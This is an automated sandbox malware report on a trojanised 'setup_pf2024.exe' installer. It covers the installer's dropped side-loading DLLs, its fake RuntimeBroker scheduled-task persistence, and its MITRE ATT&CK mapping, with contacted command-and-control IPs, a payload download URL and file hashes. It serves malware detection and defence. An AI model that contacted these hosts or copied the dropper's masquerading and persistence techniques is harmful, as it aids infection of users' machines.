                    Source: C:\Users\Wegame\Wegame.exeCode function: 3_2_0044DC7C ?to_json@jsonbind@@YAHPAXAAVValue@Json@@@Z,3_2_0044DC7C

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure1
                    Valid Accounts                    		2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		11
                    Input Capture                    		2
                    System Time Discovery                    		Remote Services11
                    Archive Collected Data                    		1
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomains2
                    Replication Through Removable Media                    		2
                    Command and Scripting Interpreter                    		1
                    Create Account                    		1
                    Valid Accounts                    		4
                    Obfuscated Files or Information                    		LSASS Memory11
                    Peripheral Device Discovery                    		Remote Desktop Protocol11
                    Input Capture                    		21
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		1
                    Valid Accounts                    		11
                    Access Token Manipulation                    		1
                    Software Packing                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares3
                    Clipboard Data                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts12
                    Service Execution                    		22
                    Windows Service                    		22
                    Windows Service                    		1
                    DLL Side-Loading                    		NTDS47
                    System Information Discovery                    		Distributed Component Object ModelInput Capture2
                    Non-Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchd1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    File Deletion                    		LSA Secrets61
                    Security Software Discovery                    		SSHKeylogging113
                    Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled Task1
                    Bootkit                    		1
                    Scheduled Task/Job                    		211
                    Masquerading                    		Cached Domain Credentials3
                    Virtualization/Sandbox Evasion                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Valid Accounts                    		DCSync2
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job3
                    Virtualization/Sandbox Evasion                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt11
                    Access Token Manipulation                    		/etc/passwd and /etc/shadow1
                    System Network Configuration Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron12
                    Process Injection                    		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                    Bootkit                    		Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1408805 Sample: setup#U67e5#U8be2_pf2024.exe Startdate: 14/03/2024 Architecture: WINDOWS Score: 100 35 tqos.wegamex.com.hk 2->35 37 ied-tqos.wegamex.com.hk 2->37 39 2 other IPs or domains 2->39 49 Snort IDS alert for network traffic 2->49 51 Found malware configuration 2->51 53 Malicious sample detected (through community Yara rule) 2->53 55 8 other signatures 2->55 8 setup#U67e5#U8be2_pf2024.exe 20 2->8         started        signatures3 process4 dnsIp5 41 bj.file.myqcloud.com 82.156.94.17, 443, 49699 ECLIPSEGB China 8->41 27 C:\Users\wm.exe, PE32 8->27 dropped 29 C:\Users\Wegame\common.dll, PE32 8->29 dropped 31 C:\Users\Wegame\adapt_for_imports.dll, PE32 8->31 dropped 33 6 other files (5 malicious) 8->33 dropped 57 Drops PE files to the user root directory 8->57 59 Deletes itself after installation 8->59 61 Drops PE files with benign system names 8->61 13 Wegame.exe 17 8->13         started        17 RuntimeBroker.exe 3 8->17         started        19 cmd.exe 1 8->19         started        21 kill.exe 3 1 8->21         started        file6 signatures7 process8 dnsIp9 43 ied-tqos.wegamex.com.hk 103.7.30.61, 8000 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 13->43 45 tqos.wegamex.com.hk 103.7.30.83, 80, 8000 TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCN China 13->45 63 Contains functionality to infect the boot sector 13->63 47 154.91.65.2, 49701, 8000 IKGUL-26484US Seychelles 17->47 23 conhost.exe 19->23         started        25 conhost.exe 21->25         started        signatures10 process11

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    setup#U67e5#U8be2_pf2024.exe53%ReversingLabsWin32.Trojan.FlyAgent
                    setup#U67e5#U8be2_pf2024.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\ProgramData\RuntimeBroker.exe0%ReversingLabs
                    C:\ProgramData\RuntimeBroker.exe0%VirustotalBrowse
                    C:\ProgramData\libcef.dll0%ReversingLabs
                    C:\ProgramData\libcef.dll1%VirustotalBrowse
                    C:\Users\Statr\jli.dll3%ReversingLabs
                    C:\Users\Statr\jli.dll6%VirustotalBrowse
                    C:\Users\Statr\kill.exe3%ReversingLabs
                    C:\Users\Statr\kill.exe0%VirustotalBrowse
                    C:\Users\Wegame\Lua51.dll0%ReversingLabs
                    C:\Users\Wegame\Lua51.dll0%VirustotalBrowse
                    C:\Users\Wegame\Wegame.exe0%ReversingLabs
                    C:\Users\Wegame\Wegame.exe0%VirustotalBrowse
                    C:\Users\Wegame\adapt_for_imports.dll0%ReversingLabs
                    C:\Users\Wegame\adapt_for_imports.dll0%VirustotalBrowse
                    C:\Users\Wegame\common.dll0%ReversingLabs
                    C:\Users\Wegame\common.dll0%VirustotalBrowse
                    C:\Users\wm.exe0%ReversingLabs
                    C:\Users\wm.exe0%VirustotalBrowse

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    SourceDetectionScannerLabelLink
                    ied-tqos.wegamex.com.hk0%VirustotalBrowse
                    tqos.wegamex.com.hk0%VirustotalBrowse

                    URLs

                    SourceDetectionScannerLabelLink
                    http://ocsp.thawte.com00%URL Reputationsafe
                    154.91.65.20%Avira URL Cloudsafe
                    http://www.google.comcefsimplestring0%Avira URL Cloudsafe
                    154.91.65.21%VirustotalBrowse

                    Domains and IPs

                    Contacted Domains

                    NameIPActiveMaliciousAntivirus DetectionReputation
                    ied-tqos.wegamex.com.hk
                    		103.7.30.61
                    		truefalseunknown
                    bj.file.myqcloud.com
                    		82.156.94.17
                    		truefalse
                      		high
                      tqos.wegamex.com.hk
                      		103.7.30.83
                      		truefalseunknown
                      chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        154.91.65.2true
                        • 1%, Virustotal, Browse
                        • Avira URL Cloud: safe
                        		unknown
                        https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          http://www.winimage.com/zLibDll1.2.5setup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drfalse
                            		high
                            https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtmFsetup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://www.vmware.com/support/reference/common/info_tools.html.setup#U67e5#U8be2_pf2024.exe, winPre2k.iso.0.drfalse
                                		high
                                http://www.vmware.com/0setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, winPre2k.iso.0.drfalse
                                  		high
                                  http://crl.thawte.com/ThawteTimestampingCA.crl0setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drfalse
                                    		high
                                    http://www.google.comcefsimplestringsetup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.symauth.com/rpa00setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drfalse
                                      		high
                                      https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/setup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000001FE5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://ocsp.thawte.com0setup#U67e5#U8be2_pf2024.exe, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.dr, winPre2k.iso.0.drfalse
                                        • URL Reputation: safe
                                        		unknown
                                        http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396a-s-fsetup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drfalse
                                          		high
                                          https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtlsetup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246646530.0000000003A60000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://www.vmware.com/go/vcloud_loginwm.exe.0.drfalse
                                              		high
                                              http://www.vmware.com/0/setup#U67e5#U8be2_pf2024.exe, wm.exe.0.drfalse
                                                		high
                                                https://www.xiami.com/0setup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drfalse
                                                  		high
                                                  http://www.google.comsetup#U67e5#U8be2_pf2024.exe, RuntimeBroker.exe.0.drfalse
                                                    		high
                                                    http://www.winimage.com/zLibDllsetup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drfalse
                                                      		high
                                                      http://www.symauth.com/cps0(setup#U67e5#U8be2_pf2024.exe, wm.exe.0.dr, kill.exe.0.dr, RuntimeBroker.exe.0.dr, Lua51.dll.0.drfalse
                                                        		high
                                                        http://ue.qq.com/mur/?a=survey&b=15087&c=1&d=15272af955762c32696995ddcabc396asetup#U67e5#U8be2_pf2024.exe, Wegame.exe.0.drfalse
                                                          		high
                                                          https://curl.haxx.se/docs/http-cookies.htmlsetup#U67e5#U8be2_pf2024.exe, common.dll.0.drfalse
                                                            		high
                                                            https://chengwangbaikou-1322151504.cos.ap-beijing.myqcloud.com/guofucheng.txtPFsetup#U67e5#U8be2_pf2024.exe, 00000000.00000002.2246415889.0000000002019000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high

                                                              World Map of Contacted IPs

                                                              • No. of IPs < 25%
                                                              • 25% < No. of IPs < 50%
                                                              • 50% < No. of IPs < 75%
                                                              • 75% < No. of IPs

                                                              Public IPs

                                                              IPDomainCountryFlagASNASN NameMalicious
                                                              82.156.94.17
                                                              		bj.file.myqcloud.comChina
                                                              		12513ECLIPSEGBfalse
                                                              154.91.65.2
                                                              		unknownSeychelles
                                                              		26484IKGUL-26484UStrue
                                                              103.7.30.61
                                                              		ied-tqos.wegamex.com.hkChina
                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse
                                                              103.7.30.83
                                                              		tqos.wegamex.com.hkChina
                                                              		132203TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNfalse

                                                              General Information

                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1408805
                                                              Start date and time:2024-03-14 08:45:10 +01:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 25s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:13
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:setup#U67e5#U8be2_pf2024.exe
                                                              renamed because original name is a hash value
                                                              Original Sample Name:setup_pf2024.exe
                                                              Detection:MAL
                                                              Classification:mal100.troj.evad.winEXE@11/16@5/4
                                                              EGA Information:
                                                              • Successful, ratio: 75%
                                                              HCA Information:
                                                              • Successful, ratio: 83%
                                                              • Number of executed functions: 205
                                                              • Number of non-executed functions: 131
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .exe

                                                              Warnings

                                                              • Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target setup#U67e5#U8be2_pf2024.exe, PID 5224 because it is empty
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report creation exceeded maximum time and may have missing disassembly code information.
                                                              • Report size exceeded maximum capacity and may have missing disassembly code.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.

                                                              Simulations

                                                              Behavior and APIs

                                                              TimeTypeDescription
                                                              08:46:09Task SchedulerRun new task: RuntimeBroker Config Logon Trigger Task path: C:\ProgramData\RuntimeBroker.exe
                                                              08:47:42API Interceptor1126x Sleep call for process: Wegame.exe modified

                                                              Joe Sandbox View / Context

                                                              IPs

                                                              No context

                                                              Domains

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              bj.file.myqcloud.comhttps://appservies02342-1321331581.cos.ap-beijing.myqcloud.com/cummon/update-agreements/claimGet hashmaliciousHTMLPhisherBrowse
                                                              • 82.156.94.13
                                                              New_Text_Document_mod.exse.exeGet hashmaliciousAgentTesla, Amadey, Creal Stealer, Djvu, FormBook, Glupteba, GuLoaderBrowse
                                                              • 82.156.94.48
                                                              4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.45
                                                              4a9OE5cKJo.exeGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.47
                                                              1q3HnZAcnJ.exeGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.45
                                                              word.exeGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.48

                                                              ASNs

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              ECLIPSEGBj1JQUGZYNv.exeGet hashmaliciousMetasploitBrowse
                                                              • 82.156.211.202
                                                              j1JQUGZYNv.exeGet hashmaliciousMetasploitBrowse
                                                              • 82.156.211.202
                                                              SecuriteInfo.com.Win32.SpywareX-gen.12944.24536.exeGet hashmaliciousUnknownBrowse
                                                              • 82.157.38.90
                                                              SecuriteInfo.com.Riskware.Agent.9873.20281.exeGet hashmaliciousUnknownBrowse
                                                              • 82.157.38.90
                                                              Oy4LS6Vost.elfGet hashmaliciousMiraiBrowse
                                                              • 213.152.62.162
                                                              rDaOraovjl.elfGet hashmaliciousUnknownBrowse
                                                              • 109.176.184.204
                                                              SecuriteInfo.com.Win32.SpywareX-gen.29536.7811.exeGet hashmaliciousUnknownBrowse
                                                              • 82.157.38.90
                                                              pm71xWvAqP.elfGet hashmaliciousMoobotBrowse
                                                              • 213.152.62.175
                                                              UX1Kgk69dt.elfGet hashmaliciousUnknownBrowse
                                                              • 82.153.19.219
                                                              mWkws6AHZd.elfGet hashmaliciousMiraiBrowse
                                                              • 82.153.67.113
                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNjHahp2yDiQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.50.46
                                                              iAh71RkF8q.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.50.46
                                                              omLMIQ8D45.elfGet hashmaliciousMiraiBrowse
                                                              • 170.106.77.56
                                                              iOsHTdcOUN.elfGet hashmaliciousMiraiBrowse
                                                              • 49.51.28.163
                                                              https://gladwinlindoor.goprospero.com/P4f321Get hashmaliciousHTMLPhisherBrowse
                                                              • 49.51.54.104
                                                              YupN2xJdGj.elfGet hashmaliciousMiraiBrowse
                                                              • 124.156.5.106
                                                              pN5pl7CNdG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.55.46
                                                              wLSb04sdBr.elfGet hashmaliciousMiraiBrowse
                                                              • 162.62.164.124
                                                              npIt7BAJ8M.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 119.28.77.240
                                                              SecuriteInfo.com.W32.Bredolab.O.gen.Eldorado.6984.5784.exeGet hashmaliciousUnknownBrowse
                                                              • 150.109.159.12
                                                              TENCENT-NET-AP-CNTencentBuildingKejizhongyiAvenueCNjHahp2yDiQ.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.50.46
                                                              iAh71RkF8q.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.50.46
                                                              omLMIQ8D45.elfGet hashmaliciousMiraiBrowse
                                                              • 170.106.77.56
                                                              iOsHTdcOUN.elfGet hashmaliciousMiraiBrowse
                                                              • 49.51.28.163
                                                              https://gladwinlindoor.goprospero.com/P4f321Get hashmaliciousHTMLPhisherBrowse
                                                              • 49.51.54.104
                                                              YupN2xJdGj.elfGet hashmaliciousMiraiBrowse
                                                              • 124.156.5.106
                                                              pN5pl7CNdG.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                              • 49.51.55.46
                                                              wLSb04sdBr.elfGet hashmaliciousMiraiBrowse
                                                              • 162.62.164.124
                                                              npIt7BAJ8M.elfGet hashmaliciousMirai, OkiruBrowse
                                                              • 119.28.77.240
                                                              SecuriteInfo.com.W32.Bredolab.O.gen.Eldorado.6984.5784.exeGet hashmaliciousUnknownBrowse
                                                              • 150.109.159.12
                                                              IKGUL-26484USSOAkQezXit.elfGet hashmaliciousMiraiBrowse
                                                              • 156.251.85.214
                                                              dCgxRUNy7h.elfGet hashmaliciousMiraiBrowse
                                                              • 156.231.211.153
                                                              sxUaaIRWNm.elfGet hashmaliciousMiraiBrowse
                                                              • 156.251.85.213
                                                              skid.arm5.elfGet hashmaliciousMiraiBrowse
                                                              • 156.249.231.161
                                                              aqyjGt6g68.elfGet hashmaliciousMiraiBrowse
                                                              • 156.249.34.104
                                                              SecuriteInfo.com.Win32.TrojanX-gen.31341.14615.dllGet hashmaliciousUnknownBrowse
                                                              • 164.155.177.195
                                                              SecuriteInfo.com.BScope.Adware.Softcnapp.31344.28361.exeGet hashmaliciousPoisonivyBrowse
                                                              • 156.251.70.37
                                                              RDf54Bs5B8Get hashmaliciousXorDDoSBrowse
                                                              • 23.235.171.197
                                                              http://hip-foul-face.glitch.me/makslfqwlw38laii.htmlIP:Get hashmaliciousUnknownBrowse
                                                              • 156.251.70.41
                                                              6l1kqDkxR2.elfGet hashmaliciousMoobotBrowse
                                                              • 103.223.124.146

                                                              JA3 Fingerprints

                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                              37f463bf4616ecd445d4a1937da06e19Molex Parts Table 14-03-2024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 82.156.94.17
                                                              SecuriteInfo.com.Program.Unwanted.5011.4925.3230.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 82.156.94.17
                                                              SecuriteInfo.com.Program.Unwanted.5011.4925.3230.exeGet hashmaliciousPureLog StealerBrowse
                                                              • 82.156.94.17
                                                              wsr3iUW0I0.exeGet hashmaliciousLummaC, Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, Mars Stealer, PureLog StealerBrowse
                                                              • 82.156.94.17
                                                              decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.17
                                                              decrypt-main.dll.dllGet hashmaliciousUnknownBrowse
                                                              • 82.156.94.17
                                                              E-dekont.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 82.156.94.17
                                                              MT103.exeGet hashmaliciousAgentTeslaBrowse
                                                              • 82.156.94.17
                                                              BL copy.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                              • 82.156.94.17
                                                              2257HVL2300001691.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                              • 82.156.94.17

                                                              Dropped Files

                                                              No context

                                                              Created / dropped Files

                                                              C:\ProgramData\RuntimeBroker.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):848200
                                                              Entropy (8bit):6.314251035785333
                                                              Encrypted:false
                                                              SSDEEP:24576:Qh7U9b1uRuQL/3Vfvh6dW9qb+LIMQQ1LJA3l3sX51c:4495uRuQL/3Vfvh6djqLIMQOL6l8Pc
                                                              MD5:67EE3B7CA47FEC435EAB6DDE7AAEDCF7
                                                              SHA1:91BE7A2521C014B1AB5C2785C577D34FE6808D92
                                                              SHA-256:253A5232AB3F084BBAA49550B6C9EAE837A683B34548291D3DD1B13AEE2AF5A5
                                                              SHA-512:61270CED21150BED04CADB603CBEC313F771EF36A030EF3153F010A4D8966ED477AA7E226A91B4EF512528B0AE0033525F28D7E99EFE0197296EC5CF633B9D1A
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 0%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........nz..............m.......m..&....m.............Qm......Qm......Qm.......m.......m..................\...Cl......Cl......Cl....Cl......Rich............PE..L...HL.\.........."..........6......x.............@.................................Gn....@.........................`...p..............................H.......4w...#......................H$.......#..@............................................text............................... ..`.rdata..............................@..@.data..../..........................@....rsrc...............................@..@.reloc..4w.......x...\..............@..B................................................................................................................................................................................................................................................................................

                                                              C:\ProgramData\libcef.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):33856
                                                              Entropy (8bit):6.688937579381936
                                                              Encrypted:false
                                                              SSDEEP:768:k7YBqjxHP09PYYiOD9QGOZndZeAYp9gd2KglQ95DDUf2h:zqMPJiODtOZ6dp9gEzQ953Uf
                                                              MD5:E6F634AB4CC71631374B232D8C646B09
                                                              SHA1:F2E91CEC97F008577DD567CCAD061CC9B9A41792
                                                              SHA-256:D4554FB4BA264A34B44541F95F5DAD8D5DFC3F9B3525407DD3EFC0A112344584
                                                              SHA-512:AE43E88547CD366471AC7CB25C8D7FD1AE883CD7FE013C87D65D38975DE5B1537FE33ED93CE70AB8819B702A8EAED3D53D4DA58355A1AA3B236667076E878D12
                                                              Malicious:false
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                              • Antivirus: Virustotal, Detection: 1%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g*.>#K.m#K.m#K.m..Nm"K.mL=Hm"K.mL=|m/K.mL=Jm'K.m*3Em K.m#K.m.K.mL=}m%K.mL=Mm"K.mL=Km"K.mRich#K.m........................PE..L...3..e...........!.................%.......0............................................@..........................;.......5..P....`..`............@..@D...p..0....1...............................1..@............0...............................text............................... ..`.rdata..j....0......."..............@..@.data........P.......4..............@....rsrc...`....`.......6..............@..@.reloc.......p.......<..............@..B................................................................................................................................................................................................................................................................................................................

                                                              C:\ProgramData\winin.ini

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:data
                                                              Category:dropped
                                                              Size (bytes):89092
                                                              Entropy (8bit):7.663879590395084
                                                              Encrypted:false
                                                              SSDEEP:1536:xUvwd0ymKlRPa9Sj0c9cWr8E2ntEpeMkZm6+LW4VhTQILcodYcxLlQKx:vd7lRP9Ic9ClaeMk9UW4V5XLVx
                                                              MD5:B2327A8E16382A4849592C215C4999A3
                                                              SHA1:36369369EC3C721C61B17CDA16DC74AEE4B451E4
                                                              SHA-256:069B440F8C99A98DD2421F45B307DC266C1342A9A87CAFC00D4A93FBD805471E
                                                              SHA-512:F8BC83F8D2F7EF5B7CAE74FABCB8EEA3EA548E58366A45597754B5EEC54B1848B5A9B4B0B5679E8832F063CE68256E4B4151AB84D8F8FC460719F60614BFE4AB
                                                              Malicious:false
                                                              Reputation:low
                                                              Preview:.K=A43......N7J...[s?\@nT.=rzU.^.:..d.k72n.Q...u_FD.c.<.'*Y1...^.LA3E.n.>..*.W-n.{+..p.!E7,....ZsW.*\2.V.UR6...%..J.2nf /.3..E.FDHn..I.r3T.']N..e.v#6..z.DK=.O.M%d....7JE.c.sWY&..F.rzU4..].C4E...J.xEv3..E.FDHP..I.r3T...^.LA3.g.Y..1`v[.pOv(@..^a5Q..bc.5..}...&.!.....5T.pa8U."B/.2q....b....O753U..o=,;...0E.!h..1.ye}......>..v..b...W.?.*p,R....../T.xa0Q.*B'1...L.?..lT./I/"..l/.>v).G.@.!h7.....4kH...p.!E7..b.GZs"*('....zURP....4EnDF..\.vUF..z.DH6+..%..p.Kyz=&$j....L^e...,.'l9.(p.....EF3.I.....p.=rz....y=Cw$._.*B....b...'0...O.%...l>*.!8'.2.L...9`7[.pO5+J.....7JE.G..W.Y@n....zURw....4En..J.xEv3..E.FDHp+..h.3TH..^.LA3.W_...A.K=AR..i.dTzu$..a.3GZ...d.Tb=..]R6..|.j..Yffx...L.^FD"...I.r3T.-..v.A3vE..h.eDK...w...@.z!E..arc....3L1.&.6....T.yg,.*..>3..RI ..zX..BzC...=...=^F*.wR5.!h...o%.O.M%d./...V..Gcr..3U62.yVn3.rdo....n72."\]..b.a^F....Oq..Gp`...A..wROP.8zq...Y..l.%dT*t.snY .3~m..4J|.....4..])%..J!.*BD.2q^..z.DH6.>..V/..?]R...R.6eL8.0o).pOP..@.z!Eg....[<.#}^>...Z...rd)[.Haz.vJ~..R.Fha

                                                              C:\Users\Statr\jli.dll

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):145984
                                                              Entropy (8bit):6.62050830630065
                                                              Encrypted:false
                                                              SSDEEP:1536:0YOsQfViRGpZDcQJUd+AXfY3BHSvDk8nWKI53/+XK5jiWW3Hj/9gEzQ953Uf:0AQfYQ4xxAYvDk8w3W+jiWMHW
                                                              MD5:E3351B7A306463B37F51A7A9A4ACC2C5
                                                              SHA1:AA7018C4A38DCA47FD167B985E70DE0C10B0154D
                                                              SHA-256:03A8B5BFC72ABDA1ED6D197D9F77B20AE9CAA229A1573BA04441553ADD0DDB28
                                                              SHA-512:E1BAC46FD29934B42F3BF6AA5999F41780B54F79775CA81F63DF43FEA96AB5E5527FABF991C692C0A60C266E2D389627CBF895CF9BBC9DDDED8068686951A643
                                                              Malicious:true
                                                              Antivirus:
                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                              • Antivirus: Virustotal, Detection: 6%, Browse
                                                              Reputation:low
                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........`Ib..'1..'1..'1.w.1..'1.y.1..'1.w.1..'1.w.1..'1.y.1..'1..&1..'1.w.1..'1.w.1..'1.w.1..'1Rich..'1........PE..L...y].e...........!.....`...........m.......p...............................@............@.........................p..........x.......................@D... ......................................H...@............p...............................text....^.......`.................. ..`.rdata...T...p...V...d..............@..@.data....6..........................@....rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                              C:\Users\Statr\kill.exe

                                                              Download File
                                                              Process:C:\Users\user\Desktop\setup#U67e5#U8be2_pf2024.exe
                                                              File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                              Category:dropped
                                                              Size (bytes):15968
                                                              Entropy (8bit):6.475201750590772
                                                              Encrypted:false
                                                              SSDEEP:384:GpsDs5hnRv7NmSHhV8xxeeh4Szv4nYPLr7dV6:GpsynGS/8x4ehJ4C7dQ
                                                              MD5:D94C31E9C9C9A1273CC67DC6FFAF9984
                                                              SHA1:CF2A10355DD3944EAF53A238A202B0750AB4F374
                                                              SHA-256:E581839F59964E4E4D837D935AC262756A466FAC1C0F03ABA0CC83B90ED0CF11
